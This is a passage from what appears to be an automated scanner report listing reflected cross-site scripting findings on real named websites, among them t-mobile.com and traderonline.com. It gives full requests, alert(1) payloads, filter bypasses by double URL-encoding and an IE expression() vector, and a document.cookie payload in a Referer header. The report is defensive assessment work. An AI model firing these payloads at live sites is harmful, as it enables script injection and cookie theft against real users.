This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /subscription-services/preview-current-issue?eeb93%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e6761baa2a47=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:48:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:48:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/subscription-services/preview-current-issue?eeb93"><script>alert(1)</script>6761baa2a47=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.1444. http://www.t-mobile.com/Company/Community.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.t-mobile.com
Path:   /Company/Community.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2daf"style%3d"x%3aexpression(alert(1))"008dbd21a92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b2daf"style="x:expression(alert(1))"008dbd21a92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Company/Community.aspx?b2daf"style%3d"x%3aexpression(alert(1))"008dbd21a92=1 HTTP/1.1
Host: www.t-mobile.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Last-Modified: Mon, 01 Sep 1997 01:03:33 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: TMobileCommon=TeaId=7170e21c-5da8-42b3-a7cc-4e70fc4c0b25; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=wu5vqsnulntruhz4z2jwxbrw; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: TMobileCommon=TeaId=7170e21c-5da8-42b3-a7cc-4e70fc4c0b25; domain=.t-mobile.com; path=/
Set-Cookie: ASP.NET_SessionId=wu5vqsnulntruhz4z2jwxbrw; path=/; HttpOnly
Set-Cookie: PartnerExpiration=PARTNER=!2%2f8%2f2011+4%3a39%3a18+AM; domain=.t-mobile.com; expires=Wed, 25-Jan-2012 04:39:18 GMT; path=/
Set-Cookie: TMobilePartner=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:39:18 GMT; path=/
Set-Cookie: PartnerExpiration=; domain=.t-mobile.com; expires=Wed, 25-Jan-2006 04:39:18 GMT; path=/
Set-Cookie: TMobileSession=WT=&DCS=; domain=.t-mobile.com; path=/
Date: Tue, 25 Jan 2011 04:39:18 GMT
Connection: close
Content-Length: 40642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><style type="text/css" media="
...[SNIP]...
<a class="tablink" href="/Company/Community.aspx?tp=Abt_Tab_Safety&amp;b2daf"style="x:expression(alert(1))"008dbd21a92=1">
...[SNIP]...

4.1445. http://www.traderonline.com/about/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9fd2b<script>alert(1)</script>660c9db3cc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about9fd2b<script>alert(1)</script>660c9db3cc8/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:31 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27585


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/about9fd2b<script>alert(1)</script>660c9db3cc8/</span>
...[SNIP]...

4.1446. http://www.traderonline.com/about/feedback/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/feedback/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 21819<script>alert(1)</script>5aa6dc8921c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about21819<script>alert(1)</script>5aa6dc8921c/feedback/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:42 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/about21819<script>alert(1)</script>5aa6dc8921c/feedback/</span>
...[SNIP]...

4.1447. http://www.traderonline.com/about/feedback/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/feedback/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e07a2<script>alert(1)</script>81ab1500d55 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/feedbacke07a2<script>alert(1)</script>81ab1500d55/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:46 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/about/feedbacke07a2<script>alert(1)</script>81ab1500d55/</span>
...[SNIP]...

4.1448. http://www.traderonline.com/about/feedback/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/feedback/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 797b8"%3balert(1)//59346c5fa60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 797b8";alert(1)//59346c5fa60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /about/feedback/?797b8"%3balert(1)//59346c5fa60=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:30 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 35390


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Contact Us at TraderOnline.com</title>
   <meta name="description" content="Trader Online is the leader in online
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?797b8";alert(1)//59346c5fa60=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1449. http://www.traderonline.com/about/magazines/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/magazines/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d1abb<script>alert(1)</script>dc321d330e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutd1abb<script>alert(1)</script>dc321d330e0/magazines/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:41 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/aboutd1abb<script>alert(1)</script>dc321d330e0/magazines/</span>
...[SNIP]...

4.1450. http://www.traderonline.com/about/magazines/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/magazines/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d384f<script>alert(1)</script>49cad96841d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/magazinesd384f<script>alert(1)</script>49cad96841d/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:45 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/about/magazinesd384f<script>alert(1)</script>49cad96841d/</span>
...[SNIP]...

4.1451. http://www.traderonline.com/about/newsletter/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/newsletter/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6d9e<script>alert(1)</script>5fa6a98e11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutf6d9e<script>alert(1)</script>5fa6a98e11/newsletter/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:40 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27595


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/aboutf6d9e<script>alert(1)</script>5fa6a98e11/newsletter/</span>
...[SNIP]...

4.1452. http://www.traderonline.com/about/newsletter/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /about/newsletter/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fc07<script>alert(1)</script>39f52bc21e9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/newsletter4fc07<script>alert(1)</script>39f52bc21e9/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:44 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27596


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/about/newsletter4fc07<script>alert(1)</script>39f52bc21e9/</span>
...[SNIP]...

4.1453. http://www.traderonline.com/advertise/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /advertise/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a58dd<script>alert(1)</script>ec8df3e0846 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertisea58dd<script>alert(1)</script>ec8df3e0846/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:09 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/advertisea58dd<script>alert(1)</script>ec8df3e0846/</span>
...[SNIP]...

4.1454. http://www.traderonline.com/advertiser-agreement/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /advertiser-agreement/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8691b<script>alert(1)</script>65be1beee20 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /advertiser-agreement8691b<script>alert(1)</script>65be1beee20/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:10:58 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27600


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/advertiser-agreement8691b<script>alert(1)</script>65be1beee20/</span>
...[SNIP]...

4.1455. http://www.traderonline.com/advertiser-agreement/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /advertiser-agreement/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5579"%3balert(1)//18aae412f91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5579";alert(1)//18aae412f91 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advertiser-agreement/?e5579"%3balert(1)//18aae412f91=1 HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:10:48 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27015


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TraderOnline.com Advertiser Agreement</title>
   <meta name="description" content="View the Advertiser Agreement fo
...[SNIP]...
<SCRIPT>DisplayAds("traderonline","www.traderonline.com/", "", "", "?e5579";alert(1)//18aae412f91=1&","Right1","0","0")</SCRIPT>
...[SNIP]...

4.1456. http://www.traderonline.com/copyright/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /copyright/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44c48<script>alert(1)</script>923c2e1ea45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /copyright44c48<script>alert(1)</script>923c2e1ea45/ HTTP/1.1
Host: www.traderonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_nr%3D1295884803685%7C1298476803685%3B%20s_lv%3D1295884803686%7C1390492803686%3B%20s_lv_s%3DFirst%2520Visit%7C1295886603686%3B; __utmz=144997931.1295884751.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; s_sess=%20s_cc%3Dtrue%3B%20s_evar2%3DData%2520Not%2520Available%3B%20s_evar3%3DData%2520Not%2520Available%3B%20s_evar4%3DData%2520Not%2520Available%3B%20s_sq%3D%3B; s_vi=[CS]v1|269ED0D58501209E-6000010F000341E3[CE]; OAX=rcHW8009oaoAAx1V; __utma=144997931.534060529.1295884751.1295884751.1295884751.1; __utmc=144997931; __utmb=144997931.3.10.1295884751;

Response

HTTP/1.1 404 Not Found
Date: Tue, 25 Jan 2011 00:11:10 GMT
Server: Apache/2.0.63 (Unix) DAV/2 PHP/5.2.13
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 27589


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>Information fourofour TraderOnline.com, Trader Magazines, and TraderOnline family sites. &#8211; TraderOnline.com
...[SNIP]...
<span style="color:red;">/copyright44c48<script>alert(1)</script>923c2e1ea45/</span>
...[SNIP]...

4.1457. http://www.traderonline.com/css/promoCSS.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.traderonline.com
Path:   /css/promoCSS.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c89f8<script>alert(1)</script>f02bcd6ebe0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cssc89f8<script>alert(1)</script>f02bcd6ebe0/promoCSS.php HTTP/1.1
Host: www.traderonline.com
Proxy-Connection: keep-alive
Referer: http://www.traderonline.com/x22ec89d%3Cscript%3Ealert(document.cookie)%3C/script%3E93a08fbf703
